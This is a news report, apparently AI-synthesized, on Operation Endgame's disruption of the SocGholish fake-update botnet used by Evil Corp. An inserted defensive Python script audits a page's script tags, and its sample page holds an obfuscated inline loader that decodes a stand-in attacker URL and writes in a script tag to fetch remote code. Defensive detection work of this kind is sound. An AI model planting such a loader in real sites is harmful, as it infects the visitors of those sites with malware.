VYPR
breach · Published Jun 19, 2026 · 3 sources

Operation Endgame Disrupts SocGholish Malware Network Used by Evil Corp Ransomware Gang

International law enforcement has disrupted the SocGholish malware network, removing malicious code from 15,000 compromised websites and dismantling infrastructure linked to the Evil Corp ransomware group.

A major cybercriminal network involving thousands of infected websites used to distribute malware has been disrupted by an international law enforcement takedown. The action against the SocGholish malware group formed the latest part of Operation Endgame, an ongoing global police investigation to combat ransomware and cybercrime worldwide.

In an announcement by the Dutch police on June 18, action was taken to remediate infections on 15,000 websites controlled by the SocGholish group and to dismantle the botnet associated with the group. Notably, the SocGholish botnet was regularly used by Evil Corp, the notorious Russia-based ransomware and cybercrime group behind a swath of destructive malware attacks worldwide, including against governments, healthcare institutions, and enterprises.

SocGholish operators gained access to legitimate WordPress sites either by hacking them or by logging in with previously leaked credentials. As detailed by Proofpoint, which tracks SocGholish as TA569, the compromised sites were then used to push malicious pop-ups to visitors, telling them that the software they were using was out of date and needed updating. Users who installed the 'update' were infected with malware and roped into the SocGholish botnet, which was in turn used to deliver malware and ransomware to further victims.
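The infection chain above starts with JavaScript injected into pages that a legitimate, compromised site serves to its visitors. The script below is an added example, not code from the article, Proofpoint or any of the agencies named; it is the kind of first-pass check a site owner could run on a page they suspect of serving a fake-update prompt. It parses the page's HTML, lists every script tag, and flags external scripts whose host is neither the site itself nor on a known-good allowlist, plus inline scripts that contain generic obfuscation indicators. The sample page, the site host, the allowlist and the indicator list are all constructed for illustration and are not a SocGholish signature.

```python
"""Audit the script tags a web page serves against a known-good allowlist.

Added example for illustration; not from the article or any vendor tooling.
All inputs below (sample page, site host, allowlist, indicators) are constructed.
"""
from dataclasses import dataclass
from html.parser import HTMLParser
from urllib.parse import urlparse

# Generic signs of obfuscated or self-rewriting inline JavaScript. These are
# assumed indicators for the example, not a signature of any particular family.
OBFUSCATION_INDICATORS = ("eval(", "atob(", "unescape(", "document.write(", "fromCharCode")


@dataclass
class ScriptFinding:
    kind: str    # "external" (unexpected script host) or "inline" (obfuscation indicator)
    detail: str  # external host, or the indicators matched in the inline code
    line: int    # line in the HTML where the <script> tag starts


class ScriptCollector(HTMLParser):
    """Collect (src, inline_text, line) for every <script> element in a document."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False
        self._src = None
        self._line = 0
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self._src = dict(attrs).get("src") or None
            self._line = self.getpos()[0]
            self._buf = []

    def handle_data(self, data):
        # HTMLParser hands <script> bodies to handle_data as raw text.
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.scripts.append((self._src, "".join(self._buf).strip(), self._line))
            self._in_script = False


def audit_scripts(html, site_host, allowed_hosts):
    """Return findings for scripts that do not match the expected profile of the site."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src, inline, line in collector.scripts:
        if src:
            # Relative and scheme-relative URLs resolve to the site's own host.
            host = urlparse(src).hostname or site_host
            if host != site_host and host not in allowed_hosts:
                findings.append(ScriptFinding("external", host, line))
        elif inline:
            hits = [ind for ind in OBFUSCATION_INDICATORS if ind in inline]
            if hits:
                findings.append(ScriptFinding("inline", ", ".join(hits), line))
    return findings


# Constructed sample: a page with two legitimate scripts, one benign inline
# snippet, one obfuscated inline snippet and one script from an unexpected host.
SAMPLE_PAGE = """<!doctype html>
<html><head>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script src="https://fonts.example-cdn.net/loader.js"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
<script>var u=atob("aHR0cHM6Ly91cGRhdGUtY2hlY2suaW52YWxpZC91LmpzCg==");document.write(unescape("%3Cscript src='"+u+"'%3E%3C/script%3E"));</script>
</head><body>
<script src="https://update-check.invalid/stats.js"></script>
</body></html>
"""
SITE_HOST = "blog.example.org"                 # constructed
ALLOWED_HOSTS = {"fonts.example-cdn.net"}     # constructed allowlist


def run_demo():
    return audit_scripts(SAMPLE_PAGE, SITE_HOST, ALLOWED_HOSTS)


if __name__ == "__main__":
    for f in run_demo():
        print(f"line {f.line}: {f.kind} -> {f.detail}")
```

On a real site you would fetch the rendered page as a visitor (including with a browser-like User-Agent, since injected loaders often serve different content to crawlers), and you would build the allowlist from the theme and plugins you actually installed. A clean result from this check does not prove the site is clean; it only tells you the served HTML contains no unexpected script hosts or obvious obfuscation, which is why it complements, rather than replaces, rotating credentials and patching the installation.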

The international law enforcement action against SocGholish has seen the takedown of 106 servers and domains associated with the malware, as well as the remediation of infections on the compromised websites. "With these actions we deprive cybercriminals of access to infected computer systems. This prevents further damage to the digital systems of citizens, businesses and organizations worldwide and limits the spread of malware," said Maikel Rollman of the Netherlands National High Tech Crime Unit (NHCTU). "It also reduces the risk that these systems are used for cyber-attacks on critical infrastructure and other essential societal processes. This marks the beginning of further action against SocGholish," he added.

The coordinated action took place over a week and was taken jointly by specialist agents and officers at the NHCTU, the Royal Canadian Mounted Police (RCMP), the German Federal Criminal Police Office (BKA), and the US Federal Bureau of Investigation (FBI). The action also received support from Europol, Eurojust, and cybersecurity industry partners. "SocGholish is not a niche threat. Their activities reach deep into public sector and commercial environments, paving the way for other cybercriminals to gain access to networks," said Dr. Renée Burton, vice president of Infoblox Threat Intel, one of the industry partners supporting the action.

The owners of the compromised websites have been informed about what happened and urged to change their login credentials and to apply the necessary security patches. WordPress site owners more generally have been advised to change their login credentials, enable multi-factor authentication, delete any unknown additional WordPress accounts, and keep their WordPress installation up to date in the future.

This takedown represents a significant blow to Evil Corp's malware distribution pipeline, which relied on SocGholish to gain initial access to victim networks before deploying ransomware. Operation Endgame continues to demonstrate the effectiveness of international law enforcement collaboration in disrupting the infrastructure that enables ransomware operations at scale.

The SentinelOne roundup adds the detail that the SocGholish cleanup was part of Operation Endgame and was coordinated with Europol and Eurojust. It also reports that authorities urged affected site administrators to enable multi-factor authentication and keep platform software updated, framing the action as the beginning of sustained enforcement against the botnet. Separately, the article notes the FBI-led dismantling of the Chinese phishing-as-a-service (PhaaS) operation Outsider Enterprise, which caused an estimated $1.9 billion in losses and the theft of 3.8 million credit card records, alongside the takedown of over 100 Evil Corp command servers.

The Record reports that the operation, which targeted the SocGholish botnet (also known as FakeUpdates), involved coordinated actions across multiple countries to dismantle the infrastructure enabling Evil Corp's ransomware and data theft campaigns. This international law enforcement effort specifically focused on the malware delivery network that has been used for years via compromised websites.

Synthesized by Vypr AI